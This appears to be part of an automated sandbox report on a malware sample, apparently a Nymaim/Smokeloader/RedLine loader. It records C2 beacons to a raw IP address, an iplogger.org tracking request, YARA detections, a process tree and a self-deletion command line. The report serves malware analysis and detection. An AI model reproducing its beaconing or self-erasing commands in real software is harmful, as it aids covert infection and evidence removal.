                                                      Keep-Alive: timeout=5, max=96
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Oct 3, 2022 17:30:38.376482010 CEST4564OUTGET /library.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 2
                                                      Host: 171.22.30.106
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:30:38.896092892 CEST4564INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:30:38 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=95
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Oct 3, 2022 17:30:40.959604979 CEST4565OUTGET /library.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 2
                                                      Host: 171.22.30.106
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:30:41.482295990 CEST4565INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:30:40 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=94
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Oct 3, 2022 17:30:44.292083025 CEST4565OUTGET /library.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 2
                                                      Host: 171.22.30.106
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:30:44.814677000 CEST4566INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:30:44 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=93
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Oct 3, 2022 17:30:46.860872984 CEST4566OUTGET /library.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 2
                                                      Host: 171.22.30.106
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:30:47.460123062 CEST4571INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:30:46 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=92
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0
                                                      Oct 3, 2022 17:30:49.499805927 CEST4573OUTGET /library.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 2
                                                      Host: 171.22.30.106
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:30:50.041088104 CEST4573INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:30:49 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=91
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      6192.168.2.549702171.22.30.10680C:\Users\user\Desktop\file.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Oct 3, 2022 17:30:53.012393951 CEST4574OUTGET /library.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 2
                                                      Host: 171.22.30.106
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:30:53.548079967 CEST4574INHTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:30:53 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0


                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.549701148.251.234.83443C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe
                                                      TimestampkBytes transferredDirectionData
                                                      2022-10-03 15:30:47 UTC0OUTGET /1Pz8p7 HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G973U Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36
                                                      Host: iplogger.org
                                                      Connection: Keep-Alive
                                                      2022-10-03 15:30:47 UTC0INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Mon, 03 Oct 2022 15:30:47 GMT
                                                      Content-Type: image/png
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Set-Cookie: clhf03028ja=102.129.143.15; expires=Tue, 03-Oct-2023 15:30:47 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                      Set-Cookie: 333625791719766799=1; expires=Tue, 03-Oct-2023 15:30:47 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                      Expires: Mon, 03 Oct 2022 15:30:47 +0000
                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                      Strict-Transport-Security: max-age=31536000
                                                      X-Frame-Options: SAMEORIGIN
                                                      2022-10-03 15:30:47 UTC0INData Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`0


                                                      Statistics

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:17:29:28
                                                      Start date:03/10/2022
                                                      Path:C:\Users\user\Desktop\file.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\Desktop\file.exe
                                                      Imagebase:0x400000
                                                      File size:238080 bytes
                                                      MD5 hash:526FDE9E61B1B4835885973331FA1616
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.309205181.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.309205181.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.324269337.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.324269337.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.303645653.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.303645653.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.313758394.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.314053861.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.314053861.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.340099417.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.340099417.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.345695495.0000000000739000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.303166143.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.308578404.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.313966134.0000000000739000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.352618407.0000000000739000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.318572521.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.352139791.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.352139791.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.308973675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.339625229.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.319401695.0000000000739000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.337565462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.319567616.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.319567616.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.318795705.0000000000739000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.302663434.0000000000739000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.313553571.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.313553571.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.309109018.0000000000739000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.346627601.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.346627601.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.324683404.0000000000739000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000003.301103570.0000000002200000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.338909457.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.338909457.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.319176574.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.352775062.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.352775062.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.324752364.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.324752364.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.324022607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.352494062.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.313496806.0000000000739000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.339850258.0000000000739000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.337744676.0000000000739000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.345502074.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.346524213.0000000000739000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.346406888.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.313405136.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.308781752.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.308781752.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.318868933.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.318868933.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.303421378.0000000000739000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.345921160.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.345921160.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.324526447.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.302389344.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.351860425.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.308709997.0000000000739000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.352027898.0000000000739000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.302874171.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.302874171.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.324186328.0000000000739000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      Reputation:low

                                                      General

                                                      Target ID:3
                                                      Start time:17:29:31
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 528
                                                      Imagebase:0xef0000
                                                      File size:434592 bytes
                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:5
                                                      Start time:17:29:34
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 700
                                                      Imagebase:0xef0000
                                                      File size:434592 bytes
                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:7
                                                      Start time:17:29:36
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 724
                                                      Imagebase:0xef0000
                                                      File size:434592 bytes
                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:9
                                                      Start time:17:29:39
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 760
                                                      Imagebase:0xef0000
                                                      File size:434592 bytes
                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:11
                                                      Start time:17:29:41
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 768
                                                      Imagebase:0xef0000
                                                      File size:434592 bytes
                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:13
                                                      Start time:17:29:49
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 848
                                                      Imagebase:0xef0000
                                                      File size:434592 bytes
                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:15
                                                      Start time:17:29:52
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 840
                                                      Imagebase:0xef0000
                                                      File size:434592 bytes
                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Target ID:17
                                                      Start time:17:29:54
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 1032
                                                      Imagebase:0xef0000
                                                      File size:434592 bytes
                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Target ID:19
                                                      Start time:17:30:19
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 1292
                                                      Imagebase:0xef0000
                                                      File size:434592 bytes
                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Target ID:20
                                                      Start time:17:30:20
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe
                                                      Imagebase:0x11d0000
                                                      File size:232960 bytes
                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Target ID:21
                                                      Start time:17:30:21
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7fcd70000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Target ID:22
                                                      Start time:17:30:21
                                                      Start date:03/10/2022
                                                      Path:C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe"
                                                      Imagebase:0x1cfc72f0000
                                                      File size:3947920 bytes
                                                      MD5 hash:04514BD4962F7D60679434E0EBE49184
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Antivirus matches:
                                                      • Detection: 29%, ReversingLabs

                                                      General

                                                      Target ID:26
                                                      Start time:17:30:51
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 1552
                                                      Imagebase:0xef0000
                                                      File size:434592 bytes
                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Target ID:27
                                                      Start time:17:30:55
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit
                                                      Imagebase:0x11d0000
                                                      File size:232960 bytes
                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Target ID:28
                                                      Start time:17:30:56
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7fcd70000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Target ID:29
                                                      Start time:17:30:56
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:taskkill /im "file.exe" /f
                                                      Imagebase:0x130000
                                                      File size:74752 bytes
                                                      MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language

                                                      Disassembly

                                                      No disassembly